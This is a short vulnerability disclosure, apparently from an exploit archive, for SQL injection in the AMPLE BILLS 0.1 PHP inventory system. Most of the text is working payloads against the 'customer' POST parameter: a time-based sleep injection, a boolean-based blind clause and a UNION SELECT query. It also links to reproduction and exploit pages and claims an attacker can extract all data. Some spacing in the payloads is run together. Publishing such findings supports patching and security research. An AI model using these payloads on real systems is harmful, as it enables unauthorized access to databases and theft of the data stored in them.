Headline
AMPLE BILLS 0.1 SQL injection
AMPLE BILLS version 0.1 suffers from a remote SQL injection vulnerability.
## Title: AMPLE BILLS 0.1 Multiple-SQLi## Author: nu11secur1ty## Date: 04/13/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The customer parameter (#1*) appears to be vulnerable to SQL injectionattacks. The payload (select*from(select(sleep(20)))a) was submittedin the customer parameter. The application took 20017 milliseconds torespond to the request, compared with 4 milliseconds for the originalrequest, indicating that the injected SQL command caused a time delay.The database appears to be MySQL. The attacker can get all informationfrom the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: customer=(-2876) OR5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024 Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: customer=(-8147) UNION ALL SELECTCONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024- 04/13/2024---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)## Time spent:01:15:00